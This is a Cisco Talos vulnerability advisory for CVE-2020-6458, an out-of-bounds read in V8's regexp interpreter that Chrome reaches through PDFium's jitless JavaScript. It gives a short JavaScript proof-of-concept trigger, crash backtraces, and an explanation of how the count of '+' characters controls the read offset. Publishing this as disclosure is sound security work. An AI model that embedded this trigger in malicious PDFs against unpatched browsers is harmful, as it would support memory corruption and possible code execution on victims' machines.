Talos Vulnerability Report

TALOS-2020-1044

Google Chrome PDFium Javascript Regexp Memory Corruption Vulnerability

July 2, 2020
CVE Number

CVE-2020-6458

Summary

An exploitable memory corruption vulnerability exists in the way PDFium inside Google Chrome version 80.0.3987.158 executes Javascript regular expressions. The vulnerability could potentially be abused to achieve arbitrary code execution in the browser context. In order to trigger this vulnerability, a victim needs to open a malicious web page.

Tested Versions

Google Chrome 80.0.3987.158

Product URLs

https://www.google.com/chrome/

CVSSv3 Score

8.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE

CWE-805 - Buffer Access with Incorrect Length Value

Details

Google Chrome is currently the most widespread Internet browser.

Pdfium is an open source PDF renderer developed by Google and used extensively in Chrome browser, online services as well as other standalone applications. This bug was triaged on the current release version, latest git version and the latest chromium address sanitizer build available.

PDFium supports execution of Javascript scripts embedded inside PDF documents. As Chrome itself, PDFium uses V8 as its Javascript engine. This vulnerability lies in a way V8 in a specific configuration processes regular expressions. Executing the following Javascript code is enough to trigger the vulnerability:

var a  = Array(1802).join(" +") + Array(16884).join("A");
"A".search(a);
"A".search(a);

The above code first creates a very large string that acts as a regular expression. Then two identical lines execute this regex on a string “A”. Either + or ? symbols in the regex can trigger the vulnerability. By embedding the above code inside a PDF document and opening it in Chrome (or in pdfium_test directly) we can observe the following crash:

AddressSanitizer:DEADLYSIGNAL
=================================================================
==58924==ERROR: AddressSanitizer: SEGV on unknown address 0x7ea80000c074 (pc 0x55d60a40f51f bp 0x7ffd549c5ed0 sp 0x7ffd549c5d20 T0)
==58924==The signal is caused by a READ memory access.
    #0 0x55d60a40f51f in v8::internal::IrregexpInterpreter::Result v8::internal::(anonymous namespace)::RawMatch<unsigned char>(v8::internal::Isolate*, v8::internal::ByteArray, v8::internal::String, v8::internal::Vector<unsigned char const>, int*, int, unsigned int, v8::internal::RegExp::CallOrigin, unsigned int) ./../../v8/src/regexp/regexp-interpreter.cc:?
    #1 0x55d60a40f51f in ?? ??:0
    #2 0x55d60a40e061 in v8::internal::IrregexpInterpreter::MatchInternal(v8::internal::Isolate*, v8::internal::ByteArray, v8::internal::String, int*, int, int, v8::internal::RegExp::CallOrigin, unsigned int) ./../../v8/src/regexp/regexp-interpreter.cc:994
    #3 0x55d60a40e061 in ?? ??:0
    #4 0x55d60a43faa7 in Match ./../../v8/src/regexp/regexp-interpreter.cc:964
    #5 0x55d60a43faa7 in MatchForCallFromJs ./../../v8/src/regexp/regexp-interpreter.cc:1031
    #6 0x55d60a43faa7 in ?? ??:0
    #7 0x55d60bf42ccf in Builtins_RegExpSearchFast setup-isolate-deserialize.cc:?
    #8 0x55d60bf42ccf in ?? ??:0
    #9 0x55d60bd61fbb in Builtins_StringPrototypeSearch setup-isolate-deserialize.cc:?
    #10 0x55d60bd61fbb in ?? ??:0
    #11 0x55d60bb84cd0 in Builtins_InterpreterEntryTrampoline setup-isolate-deserialize.cc:?
    #12 0x55d60bb84cd0 in ?? ??:0
    #13 0x55d60bb84cd0 in Builtins_InterpreterEntryTrampoline setup-isolate-deserialize.cc:?
    #14 0x55d60bb84cd0 in ?? ??:0
    #15 0x55d60bb7b739 in Builtins_JSEntryTrampoline setup-isolate-deserialize.cc:?
    #16 0x55d60bb7b739 in ?? ??:0
    #17 0x55d60bb7b517 in Builtins_JSEntry setup-isolate-deserialize.cc:?
    #18 0x55d60bb7b517 in ?? ??:0
    #19 0x55d6095058cd in Call ./../../v8/src/execution/simulator.h:142
    #20 0x55d6095058cd in Invoke ./../../v8/src/execution/execution.cc:367
    #21 0x55d6095058cd in ?? ??:0
    #22 0x55d609504765 in v8::internal::Execution::Call(v8::internal::Isolate*, v8::internal::Handle<v8::internal::Object>, v8::internal::Handle<v8::internal::Object>, int, v8::internal::Handle<v8::internal::Object>*) ./../../v8/src/execution/execution.cc:461
    #23 0x55d609504765 in ?? ??:0
    #24 0x55d608e4926c in v8::Script::Run(v8::Local<v8::Context>) ./../../v8/src/api/api.cc:2201
    #25 0x55d608e4926c in ?? ??:0
    #26 0x55d608bb5e5f in CFXJS_Engine::Execute(fxcrt::WideString const&) ./../../fxjs/cfxjs_engine.cpp:562
    #27 0x55d608bb5e5f in ?? ??:0
    #28 0x55d608dd3a14 in CJS_Runtime::ExecuteScript(fxcrt::WideString const&) ./../../fxjs/cjs_runtime.cpp:165
    #29 0x55d608dd3a14 in ?? ??:0
    #30 0x55d608cda7b4 in CJS_EventContext::RunScript(fxcrt::WideString const&) ./../../fxjs/cjs_event_context.cpp:54
    #31 0x55d608cda7b4 in ?? ??:0
    #32 0x55d607d291c6 in CPDFSDK_ActionHandler::RunScript(CPDFSDK_FormFillEnvironment*, fxcrt::WideString const&, std::__1::function<void (IJS_EventContext*)> const&) ./../../fpdfsdk/cpdfsdk_actionhandler.cpp:424
    #33 0x55d607d291c6 in ?? ??:0
    #34 0x55d607d26849 in CPDFSDK_ActionHandler::RunDocumentOpenJavaScript(CPDFSDK_FormFillEnvironment*, fxcrt::WideString const&, fxcrt::WideString const&) ./../../fpdfsdk/cpdfsdk_actionhandler.cpp:347
    #35 0x55d607d26849 in ?? ??:0
    #36 0x55d607d26253 in CPDFSDK_ActionHandler::ExecuteDocumentOpenAction(CPDF_Action const&, CPDFSDK_FormFillEnvironment*, std::__1::set<CPDF_Dictionary const*, std::__1::less<CPDF_Dictionary const*>, std::__1::allocator<CPDF_Dictionary const*> >*) ./../../fpdfsdk/cpdfsdk_actionhandler.cpp:104
    #37 0x55d607d26253 in ?? ??:0
    #38 0x55d607d25e28 in CPDFSDK_ActionHandler::DoAction_DocOpen(CPDF_Action const&, CPDFSDK_FormFillEnvironment*) ./../../fpdfsdk/cpdfsdk_actionhandler.cpp:26
    #39 0x55d607d25e28 in ?? ??:0
    #40 0x55d607dba9cc in CPDFSDK_FormFillEnvironment::ProcOpenAction() ./../../fpdfsdk/cpdfsdk_formfillenvironment.cpp:624
    #41 0x55d607dba9cc in ?? ??:0
    #42 0x55d607e68232 in FORM_DoDocumentOpenAction ./../../fpdfsdk/fpdf_formfill.cpp:739
    #43 0x55d607e68232 in ?? ??:0
    #44 0x55d607cf457c in (anonymous namespace)::RenderPdf(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > const&, char const*, unsigned long, (anonymous namespace)::Options const&, std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > const&) ./../../samples/pdfium_test.cc:935
    #45 0x55d607cf457c in ?? ??:0
    #46 0x55d607cef3b0 in main ./../../samples/pdfium_test.cc:1172
    #47 0x55d607cef3b0 in ?? ??:0
    #48 0x7f121a0ca82f in __libc_start_main /build/glibc-LK5gWL/glibc-2.23/csu/../csu/libc-start.c:291
    #49 0x7f121a0ca82f in ?? ??:0

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV (/ramdisk/repo/pdfium/out/DebugASAN/pdfium_test+0x414351f)
==58924==ABORTING

To understand the root cause of the crash we need to step back and examine how the Regexp engine works in V8.

First thing to note is that although above PoC Javascript code isn’t PDFium specific, it doesn’t trigger the same crash in Chrome in a webpage context. This can also be observed by running the code inside d8 Javascript shell:

./d8
V8 version 8.3.65
d8> var a  = Array(1802).join(" +") + Array(16884).join("A");
undefined
d8> "A".search(a);
-1
d8> "A".search(a);
-1
d8>

If we were to dig through the execution in a debugger we would notice that since the second search call uses the identical regex and target string, code JITed during the first call is executed. Exact same code is executed twice and no crash is triggered. Running the V8 in “jitless” mode on the other hand produces a different result:

./d8 --jitless
V8 version 8.3.65
d8> var a  = Array(1802).join(" +") + Array(16884).join("A");
undefined
d8> "A".search(a);
-1
d8> "A".search(a);
Received signal 11 SEGV_ACCERR 7ed10000c05c

==== C stack trace ===============================

 [0x55c1ec79184b]
 [0x55c1eeb5d036]
 [0x7f1154dd3390]
 [0x55c1ed786c80]
 [0x55c1ed786527]
 [0x55c1ed79011e]
 [0x55c1ee9e4603]
[end of stack trace]
Segmentation fault (core dumped)

Looking up the PDFium source code would reveal that V8 is indeed initialized in “jitless” mode for specific reasons.

FPDF_EXPORT const char* FPDF_CALLCONV FPDF_GetRecommendedV8Flags() {
  // Reduce exposure since no PDF should contain web assembly.
  // Use interpreted JS only to avoid RWX pages in our address space.
  return "--no-expose-wasm --jitless";
}

...

    std::unique_ptr<v8::Platform> InitializeV8Common(const std::string& exe_path) {
  v8::V8::InitializeICUDefaultLocation(exe_path.c_str());

  std::unique_ptr<v8::Platform> platform = v8::platform::NewDefaultPlatform();
  v8::V8::InitializePlatform(platform.get());

  const char* recommended_v8_flags = FPDF_GetRecommendedV8Flags();
  v8::V8::SetFlagsFromString(recommended_v8_flags);

  // By enabling predictable mode, V8 won't post any background tasks.
  // By enabling GC, it makes it easier to chase use-after-free.
  static const char kAdditionalV8Flags[] = "--predictable --expose-gc";
  v8::V8::SetFlagsFromString(kAdditionalV8Flags);

  v8::V8::Initialize();
  return platform;
}

So, in order for this vulnerability to be reachable and exploitable in full Chrome browser, the triggering code needs to be embedded inside a PDF document.

To further understand the root cause of the vulnerability, we can observe the execution of the PoC code in d8 shell. Backtrace at the time of the crash:

#0  0x00005555589844b3 in (anonymous namespace)::(anonymous namespace)::(anonymous namespace)::RawMatch<unsigned char>((anonymous namespace)::(anonymous namespace)::Isolate *, (anonymous namespace)::(anonymous namespace)::ByteArray, (anonymous namespace)::(anonymous namespace)::String, (anonymous namespace)::(anonymous namespace)::Vector<unsigned char const>, int *, int, uint32_t, enum (anonymous namespace)::(anonymous namespace)::RegExp::CallOrigin, uint32_t) (isolate=0x9a800000000, code_array=..., subject_string=..., subject=..., registers=0x9a80000a44c, current=0x0, current_char=0xa, call_origin=(anonymous namespace)::(anonymous namespace)::RegExp::kFromJs, backtrack_limit=0x0) at ../../v8/src/regexp/regexp-interpreter.cc:406
#1  0x0000555558983c68 in (anonymous namespace)::(anonymous namespace)::IrregexpInterpreter::MatchInternal (isolate=0x9a800000000, code_array=..., subject_string=..., registers=0x9a80000a44c, registers_length=0x2, start_position=0x0, call_origin=(anonymous namespace)::(anonymous namespace)::RegExp::kFromJs, backtrack_limit=0x0) at ../../v8/src/regexp/regexp-interpreter.cc:994
#2  0x0000555558983a82 in (anonymous namespace)::(anonymous namespace)::IrregexpInterpreter::Match (isolate=0x9a800000000, regexp=..., subject_string=..., registers=0x9a80000a44c, registers_length=0x2, start_position=0x0, call_origin=(anonymous namespace)::(anonymous namespace)::RegExp::kFromJs) at ../../v8/src/regexp/regexp-interpreter.cc:964
#3  0x0000555558991456 in (anonymous namespace)::(anonymous namespace)::IrregexpInterpreter::MatchForCallFromJs (subject=0x9a8002639e9, start_position=0x0, registers=0x9a80000a44c, registers_length=0x2, call_origin=(anonymous namespace)::(anonymous namespace)::RegExp::kFromJs, isolate=0x9a800000000, regexp=0x9a8000fa2f9) at ../../v8/src/regexp/regexp-interpreter.cc:1031
#4  0x000055555995c630 in Builtins_RegExpSearchFast ()
#5  0x000055555977b91c in Builtins_StringPrototypeSearch ()
#6  0x000055555959e631 in Builtins_InterpreterEntryTrampoline ()
#7  0x000009a8000f4655 in ?? ()
#8  0x000009a8002639e9 in ?? ()
#9  0x000009a8002639e9 in ?? ()
#10 0x000009a8000d34fd in ?? ()
#11 0x000009a8002639e9 in ?? ()
#12 0x000009a8002572e5 in ?? ()
#13 0x000009a8000f4655 in ?? ()
#14 0x0000000000000102 in ?? ()
#15 0x000009a800263a45 in ?? ()
#16 0x000009a800263985 in ?? ()
#17 0x000009a800252b45 in ?? ()
#18 0x00007fffffffd0e0 in ?? ()
#19 0x000055555959e631 in Builtins_InterpreterEntryTrampoline ()
#20 0x000009a8000c716d in ?? ()
#21 0x000009a800263941 in ?? ()
#22 0x000009a800263985 in ?? ()
#23 0x000009a80004030d in ?? ()
#24 0x0000000000000064 in ?? ()
#25 0x000009a8002638f5 in ?? ()
#26 0x000009a800263941 in ?? ()
#27 0x000009a800252b45 in ?? ()
#28 0x00007fffffffd108 in ?? ()
#29 0x000055555959509a in Builtins_JSEntryTrampoline ()
#30 0x000009a8000c716d in ?? ()
#31 0x000009a800263941 in ?? ()
#32 0x0000000000000024 in ?? ()
#33 0x00007fffffffd170 in ?? ()
#34 0x0000555559594e78 in Builtins_JSEntry ()

The crash happens at ../../v8/src/regexp/regexp-interpreter.cc:406 :

  if (!backtrack_stack.push(registers[insn >> BYTECODE_SHIFT])) {
    return MaybeThrowStackOverflow(isolate, call_origin);
  }

The segmentation fault is due to an out of bounds read of a registers array. Question is: how are two calls to search different. Setting a breakpoint at ../../v8/src/regexp/regexp-interpreter.cc:994 will give us a hint. When the breakpoint is hit first, we can observe the following call stack:

#0  (anonymous namespace)::(anonymous namespace)::IrregexpInterpreter::MatchInternal (isolate=0x9a800000000, code_array=..., subject_string=..., registers=0x55555a095138, registers_length=0x2, start_position=0x0, call_origin=(anonymous namespace)::(anonymous namespace)::RegExp::kFromRuntime, backtrack_limit=0x0) at ../../v8/src/regexp/regexp-interpreter.cc:994
#1  0x0000555558983a82 in (anonymous namespace)::(anonymous namespace)::IrregexpInterpreter::Match (isolate=0x9a800000000, regexp=..., subject_string=..., registers=0x55555a095138, registers_length=0x2, start_position=0x0, call_origin=(anonymous namespace)::(anonymous namespace)::RegExp::kFromRuntime) at ../../v8/src/regexp/regexp-interpreter.cc:964
#2  0x0000555558991526 in (anonymous namespace)::(anonymous namespace)::IrregexpInterpreter::MatchForCallFromRuntime (isolate=0x9a800000000, regexp=..., subject_string=..., registers=0x55555a095138, registers_length=0x2, start_position=0x0) at ../../v8/src/regexp/regexp-interpreter.cc:1040
#3  0x00005555589ae58b in (anonymous namespace)::(anonymous namespace)::RegExpImpl::IrregexpExecRaw (isolate=0x9a800000000, regexp=..., subject=..., index=0x0, output=0x55555a095130, output_size=0x70d) at ../../v8/src/regexp/regexp.cc:574
#4  0x00005555589ab59f in (anonymous namespace)::(anonymous namespace)::RegExpImpl::IrregexpExec (isolate=0x9a800000000, regexp=..., subject=..., previous_index=0x0, last_match_info=...) at ../../v8/src/regexp/regexp.cc:652
#5  0x00005555589aaf36 in (anonymous namespace)::(anonymous namespace)::RegExp::Exec (isolate=0x9a800000000, regexp=..., subject=..., index=0x0, last_match_info=...) at ../../v8/src/regexp/regexp.cc:214
#6  0x0000555558a40f4b in (anonymous namespace)::(anonymous namespace)::__RT_impl_Runtime_RegExpExec (args=..., isolate=0x9a800000000) at ../../v8/src/runtime/runtime-regexp.cc:880
#7  0x0000555558a40888 in (anonymous namespace)::(anonymous namespace)::Runtime_RegExpExec (args_length=0x4, args_object=0x7fffffffcf28, isolate=0x9a800000000) at ../../v8/src/runtime/runtime-regexp.cc:868
#8  0x00005555597bb45f in Builtins_CEntry_Return1_DontSaveFPRegs_ArgvOnStack_NoBuiltinExit ()
#9  0x000055555995e6c4 in Builtins_RegExpSearchFast ()
#10 0x000055555977b91c in Builtins_StringPrototypeSearch ()
#11 0x000055555959e631 in Builtins_InterpreterEntryTrampoline ()
#12 0x000009a8000f4655 in ?? ()
#13 0x000009a8002639e9 in ?? ()
#14 0x000009a8002639e9 in ?? ()
#15 0x000009a8000d34fd in ?? ()
#16 0x000009a8002639e9 in ?? ()
#17 0x000009a8002572e5 in ?? ()
#18 0x000009a8000f4655 in ?? ()
#19 0x00000000000000e4 in ?? ()
#20 0x000009a800263a45 in ?? ()
#21 0x000009a800263985 in ?? ()
#22 0x000009a800252b45 in ?? ()
#23 0x00007fffffffd0e0 in ?? ()
#24 0x000055555959e631 in Builtins_InterpreterEntryTrampoline ()
#25 0x000009a8000c716d in ?? ()
#26 0x000009a800263941 in ?? ()
#27 0x000009a800263985 in ?? ()
#28 0x000009a80004030d in ?? ()
#29 0x0000000000000064 in ?? ()
#30 0x000009a8002638f5 in ?? ()
#31 0x000009a800263941 in ?? ()
#32 0x000009a800252b45 in ?? ()
#33 0x00007fffffffd108 in ?? ()
#34 0x000055555959509a in Builtins_JSEntryTrampoline ()
#35 0x000009a8000c716d in ?? ()
#36 0x000009a800263941 in ?? ()
#37 0x0000000000000024 in ?? ()
#38 0x00007fffffffd170 in ?? ()
#39 0x0000555559594e78 in Builtins_JSEntry ()

A function call of note in the above callstack is IrregexpInterpreter::MatchForCallFromRuntime . When the breakpoint is hit a second time, the callstack is slightly different:

#0  (anonymous namespace)::(anonymous namespace)::IrregexpInterpreter::MatchInternal (isolate=0x9a800000000, code_array=..., subject_string=..., registers=0x9a80000a44c, registers_length=0x2, start_position=0x0, call_origin=(anonymous namespace)::(anonymous namespace)::RegExp::kFromJs, backtrack_limit=0x0) at ../../v8/src/regexp/regexp-interpreter.cc:994
#1  0x0000555558983a82 in (anonymous namespace)::(anonymous namespace)::IrregexpInterpreter::Match (isolate=0x9a800000000, regexp=..., subject_string=..., registers=0x9a80000a44c, registers_length=0x2, start_position=0x0, call_origin=(anonymous namespace)::(anonymous namespace)::RegExp::kFromJs) at ../../v8/src/regexp/regexp-interpreter.cc:964
#2  0x0000555558991456 in (anonymous namespace)::(anonymous namespace)::IrregexpInterpreter::MatchForCallFromJs (subject=0x9a8002639e9, start_position=0x0, registers=0x9a80000a44c, registers_length=0x2, call_origin=(anonymous namespace)::(anonymous namespace)::RegExp::kFromJs, isolate=0x9a800000000, regexp=0x9a8000fa2f9) at ../../v8/src/regexp/regexp-interpreter.cc:1031
#3  0x000055555995c630 in Builtins_RegExpSearchFast ()
#4  0x000055555977b91c in Builtins_StringPrototypeSearch ()
#5  0x000055555959e631 in Builtins_InterpreterEntryTrampoline ()
#6  0x000009a8000f4655 in ?? ()
#7  0x000009a8002639e9 in ?? ()
#8  0x000009a8002639e9 in ?? ()
#9  0x000009a8000d34fd in ?? ()
#10 0x000009a8002639e9 in ?? ()
#11 0x000009a8002572e5 in ?? ()
#12 0x000009a8000f4655 in ?? ()
#13 0x0000000000000102 in ?? ()
#14 0x000009a800263a45 in ?? ()
#15 0x000009a800263985 in ?? ()
#16 0x000009a800252b45 in ?? ()
#17 0x00007fffffffd0e0 in ?? ()
#18 0x000055555959e631 in Builtins_InterpreterEntryTrampoline ()
#19 0x000009a8000c716d in ?? ()
#20 0x000009a800263941 in ?? ()
#21 0x000009a800263985 in ?? ()
#22 0x000009a80004030d in ?? ()
#23 0x0000000000000064 in ?? ()
#24 0x000009a8002638f5 in ?? ()
#25 0x000009a800263941 in ?? ()
#26 0x000009a800252b45 in ?? ()
#27 0x00007fffffffd108 in ?? ()
#28 0x000055555959509a in Builtins_JSEntryTrampoline ()
#29 0x000009a8000c716d in ?? ()
#30 0x000009a800263941 in ?? ()
#31 0x0000000000000024 in ?? ()
#32 0x00007fffffffd170 in ?? ()
#33 0x0000555559594e78 in Builtins_JSEntry ()

Instead of a call coming from runtime , we can see IrregexpInterpreter::MatchForCallFromJs. Among other differences, these two differ in who’s calling them, MatchForCallFromJs being called from builtins which consist of torque code generated via CSA. After following the relevant code, we’ll find that the function that ends up calling matchForCallFromJs with the final value of registers is RegExpBuiltinsAssembler::RegExpExecInternal, the actual call being:

TNode<Int32T> result =
    UncheckedCast<Int32T>(CallCFunctionWithoutFunctionDescriptor(
        code_entry, retval_type, std::make_pair(arg0_type, arg0),
        std::make_pair(arg1_type, arg1), std::make_pair(arg2_type, arg2),
        std::make_pair(arg3_type, arg3), std::make_pair(arg4_type, arg4),
        std::make_pair(arg5_type, arg5), std::make_pair(arg6_type, arg6),
        std::make_pair(arg7_type, arg7), std::make_pair(arg8_type, arg8),
        std::make_pair(arg9_type, arg9)));

Since we are interested in registers parameter of MatchForCallFromJs, we need to look up arg4 from above:

// Argument 4: static offsets vector buffer.
MachineType arg4_type = type_ptr;
TNode<ExternalReference> arg4 = static_offsets_vector_address;

Array static_offsets_vector_address comes from :

 TNode<ExternalReference> static_offsets_vector_address = ExternalConstant(
      ExternalReference::address_of_static_offsets_vector(isolate()));

This is initialized while current isolate was being initialized and is a statically sized vector of size 128 ints:

static const int kJSRegexpStaticOffsetsVectorSize = 128;
...

#define ISOLATE_INIT_ARRAY_LIST(V)                                             \
  /* SerializerDeserializer state. */                                          \
  V(int32_t, jsregexp_static_offsets_vector, kJSRegexpStaticOffsetsVectorSize) \

If we go back to the context of the crash, we can observe the following:

x/i $pc
=> 0x5555589844b3 <(anonymous namespace)::(anonymous namespace)::(anonymous namespace)::RawMatch<unsigned char>((anonymous namespace)::(anonymous namespace)::Isolate *, (anonymous namespace)::(anonymous namespace)::ByteArray, (anonymous namespace)::(anonymous namespace)::String, (anonymous namespace)::(anonymous namespace)::Vector<unsigned char const>, int *, int, uint32_t, enum (anonymous namespace)::(anonymous namespace)::RegExp::CallOrigin, uint32_t)+1715>:      mov    esi,DWORD PTR [rax+rdx*4]
# bt 10
#0  0x00005555589844b3 in (anonymous namespace)::(anonymous namespace)::(anonymous namespace)::RawMatch<unsigned char>((anonymous namespace)::(anonymous namespace)::Isolate *, (anonymous namespace)::(anonymous namespace)::ByteArray, (anonymous namespace)::(anonymous namespace)::String, (anonymous namespace)::(anonymous namespace)::Vector<unsigned char const>, int *, int, uint32_t, enum (anonymous namespace)::(anonymous namespace)::RegExp::CallOrigin, uint32_t) (isolate=0x9a800000000, code_array=..., subject_string=..., subject=..., registers=0x9a80000a44c, current=0x0, current_char=0xa, call_origin=(anonymous namespace)::(anonymous namespace)::RegExp::kFromJs, backtrack_limit=0x0) at ../../v8/src/regexp/regexp-interpreter.cc:406
#1  0x0000555558983c68 in (anonymous namespace)::(anonymous namespace)::IrregexpInterpreter::MatchInternal (isolate=0x9a800000000, code_array=..., subject_string=..., registers=0x9a80000a44c, registers_length=0x2, start_position=0x0, call_origin=(anonymous namespace)::(anonymous namespace)::RegExp::kFromJs, backtrack_limit=0x0) at ../../v8/src/regexp/regexp-interpreter.cc:994
#2  0x0000555558983a82 in (anonymous namespace)::(anonymous namespace)::IrregexpInterpreter::Match (isolate=0x9a800000000, regexp=..., subject_string=..., registers=0x9a80000a44c, registers_length=0x2, start_position=0x0, call_origin=(anonymous namespace)::(anonymous namespace)::RegExp::kFromJs) at ../../v8/src/regexp/regexp-interpreter.cc:964
#3  0x0000555558991456 in (anonymous namespace)::(anonymous namespace)::IrregexpInterpreter::MatchForCallFromJs (subject=0x9a8002639e9, start_position=0x0, registers=0x9a80000a44c, registers_length=0x2, call_origin=(anonymous namespace)::(anonymous namespace)::RegExp::kFromJs, isolate=0x9a800000000, regexp=0x9a8000fa2f9) at ../../v8/src/regexp/regexp-interpreter.cc:1031
#4  0x000055555995c630 in Builtins_RegExpSearchFast ()
#5  0x000055555977b91c in Builtins_StringPrototypeSearch ()
#6  0x000055555959e631 in Builtins_InterpreterEntryTrampoline ()
#7  0x000009a8000f4655 in ?? ()
#8  0x000009a8002639e9 in ?? ()
#9  0x000009a8002639e9 in ?? ()
(More stack frames follow...)
# i r rax rdx
rax            0x9a80000a44c    0x9a80000a44c
rdx            0x70a    0x70a

The crashing instruction is an indexed memory dereference where rax is a base pointer which comes directly from registers parameter and we have previously determined that this will point to static_offsets_vector_address which has limited size. Offset into this array is in rdx which holds 0x70a which is exactly the number of special + characters in our regular expression. Thus, buy controlling the size of the string and number of matching special characters (char “?” triggers the same) we can control the offset of the out of bounds read. This can lead to further memory corruption which could potentially be abused to achieve an info leak or possibly result in a arbitrary code execution.

Timeline

2020-04-02 - Vendor Disclosure

2020-04-08 - Vendor completed beta testing
2020-04-17 - Vendor patched
2020-07-02 - Public Release

Credit

Discovered by Aleksandar Nikolic of Cisco Talos.